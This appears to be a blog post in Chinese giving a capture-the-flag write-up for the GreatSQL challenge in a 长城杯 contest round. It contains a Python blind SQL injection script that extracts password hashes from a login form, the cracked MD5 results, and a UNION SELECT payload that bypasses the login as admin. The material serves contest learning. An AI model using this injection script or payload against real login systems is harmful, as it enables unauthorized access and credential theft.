<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"qst137.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="长城杯复赛线下赛没有线上紧张，第一是自己的事情，第二不用抢题做，大概我还在愚昧之峰； WebGreatSQL说是 sqlmap 可以梭？倒显得我不会用 sqlmap 了； 一个登录框，登录成功即可获得 flag ； 会提示用户是否存在，随便试了几个，admin 不存在，user 存在； 盲注爆一下 user 的密码： 12345678910111213141516import requestsur">
<meta property="og:type" content="article">
<meta property="og:title" content="长城杯复赛">
<meta property="og:url" content="https://qst137.github.io/2024/09/14/2024-09-14-%E9%95%BF%E5%9F%8E%E6%9D%AF%E5%A4%8D%E8%B5%9B/index.html">
<meta property="og:site_name" content="QST2&#39;s BLOG">
<meta property="og:description" content="长城杯复赛线下赛没有线上紧张，第一是自己的事情，第二不用抢题做，大概我还在愚昧之峰； WebGreatSQL说是 sqlmap 可以梭？倒显得我不会用 sqlmap 了； 一个登录框，登录成功即可获得 flag ； 会提示用户是否存在，随便试了几个，admin 不存在，user 存在； 盲注爆一下 user 的密码： 12345678910111213141516import requestsur">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-09-13T16:00:00.000Z">
<meta property="article:modified_time" content="2024-09-19T13:17:49.376Z">
<meta property="article:author" content="QST137">
<meta property="article:tag" content="Writeup">
<meta property="article:tag" content="CTF-Web">
<meta property="article:tag" content="CTF-Sql">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://qst137.github.io/2024/09/14/2024-09-14-%E9%95%BF%E5%9F%8E%E6%9D%AF%E5%A4%8D%E8%B5%9B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>长城杯复赛 | QST2's BLOG</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">QST2's BLOG</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Version: WwJ</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://qst137.github.io/2024/09/14/2024-09-14-%E9%95%BF%E5%9F%8E%E6%9D%AF%E5%A4%8D%E8%B5%9B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="QST137">
      <meta itemprop="description" content="苍山岁岁有人去，唯愿洱海生白波。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="QST2's BLOG">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          长城杯复赛
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2024-09-14 00:00:00" itemprop="dateCreated datePublished" datetime="2024-09-14T00:00:00+08:00">2024-09-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-09-19 21:17:49" itemprop="dateModified" datetime="2024-09-19T21:17:49+08:00">2024-09-19</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index"><span itemprop="name">ctf</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="长城杯复赛"><a href="#长城杯复赛" class="headerlink" title="长城杯复赛"></a>长城杯复赛</h1><p>线下赛没有线上紧张，第一是自己的事情，第二不用抢题做，大概我还在愚昧之峰；</p>
<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="GreatSQL"><a href="#GreatSQL" class="headerlink" title="GreatSQL"></a>GreatSQL</h3><p>说是 sqlmap 可以梭？倒显得我不会用 sqlmap 了；</p>
<p>一个登录框，登录成功即可获得 flag ；</p>
<p>会提示用户是否存在，随便试了几个，admin 不存在，user 存在；</p>
<p>盲注爆一下 user 的密码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://39.106.48.123:39446/login&quot;</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    right_password = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> password_i <span class="keyword">in</span> <span class="built_in">range</span> (<span class="number">50</span>):</span><br><span class="line">        <span class="keyword">for</span> char <span class="keyword">in</span> <span class="string">&#x27;1234567890qwertyuiopasdfghjklzxcvbnm&#x27;</span>:</span><br><span class="line">            ascii_i = <span class="built_in">ord</span>(char)</span><br><span class="line">            data = &#123;<span class="string">&quot;username&quot;</span>:<span class="string">f&quot;user\&#x27;and ascii(substr(password,<span class="subst">&#123;password_i&#125;</span>,1))=<span class="subst">&#123;ascii_i&#125;</span>;#&quot;</span>,<span class="string">&quot;password&quot;</span>:<span class="string">&quot;qst&quot;</span>&#125;</span><br><span class="line">            resp = requests.post(url=url,data = data)</span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">len</span>(resp.text) == <span class="number">4</span>:</span><br><span class="line">                <span class="built_in">print</span>(ascii_i,end=<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">                right_password = right_password+<span class="built_in">chr</span>(ascii_i)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&#x27;now:<span class="subst">&#123;right_password&#125;</span>&#x27;</span>)</span><br><span class="line">                <span class="built_in">print</span>(password_i)</span><br><span class="line"><span class="comment"># now:e10adc3949ba59abbe56e057f20f883e</span></span><br></pre></td></tr></table></figure>

<p>爆 md5，密码是 <code>md5(&#39;123456&#39;)</code>；</p>
<p>登录提示要 login as admin，类似盲注爆一下用户名，爆出 test，pika 两个，分别爆密码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># test</span></span><br><span class="line"><span class="comment"># now:098f6bcd4621d373cade4e832627b4f6</span></span><br><span class="line"><span class="comment"># md5(&#x27;test&#x27;)</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># pika</span></span><br><span class="line"><span class="comment"># now:81ccafb8ef19e583f737f569c51d3cde</span></span><br><span class="line"><span class="comment"># not a weak md5</span></span><br></pre></td></tr></table></figure>

<p>登了没用，没有 admin；</p>
<p>sql 执行出错会报不存在，测一下后台 <code>select</code> 的列数，username 为<code>user&#39; union select 1,2,3,4</code> 显示密码错误而非不存在，说明结果有四列；</p>
<p>最终 payload：</p>
<p><code>urlencode(&#39;username=usr&#39; union select 1,2,&#39;e10adc3949ba59abbe56e057f20f883e&#39;,&#39;admin&#39;;#&amp;password=123456)</code>；</p>
<h2 id="Todo-List"><a href="#Todo-List" class="headerlink" title="Todo List"></a>Todo List</h2><p>需要看一些 Java，我总感觉 OpenGauss 连网条件下应该很简单；</p>
<p>还需要学学如何配网；</p>
<p>然后把 sqlmap 用明白。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Writeup/" rel="tag"># Writeup</a>
              <a href="/tags/CTF-Web/" rel="tag"># CTF-Web</a>
              <a href="/tags/CTF-Sql/" rel="tag"># CTF-Sql</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2024/09/10/2024-09-10-%E5%A3%B9%E4%B8%AA%E6%A2%A6/" rel="prev" title="壹个梦">
      <i class="fa fa-chevron-left"></i> 壹个梦
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/09/15/2024-09-15-%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AD%A6%E4%B9%A0%E4%B9%8B%E8%82%86/" rel="next" title="区块链学习之肆">
      区块链学习之肆 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E9%95%BF%E5%9F%8E%E6%9D%AF%E5%A4%8D%E8%B5%9B"><span class="nav-number">1.</span> <span class="nav-text">长城杯复赛</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web"><span class="nav-number">1.1.</span> <span class="nav-text">Web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#GreatSQL"><span class="nav-number">1.1.1.</span> <span class="nav-text">GreatSQL</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Todo-List"><span class="nav-number">1.2.</span> <span class="nav-text">Todo List</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">QST137</p>
  <div class="site-description" itemprop="description">苍山岁岁有人去，唯愿洱海生白波。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">15</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Qst137" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Qst137" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:Q_ST@bupt.edu.cn" title="E-Mail → mailto:Q_ST@bupt.edu.cn" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">QST137</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
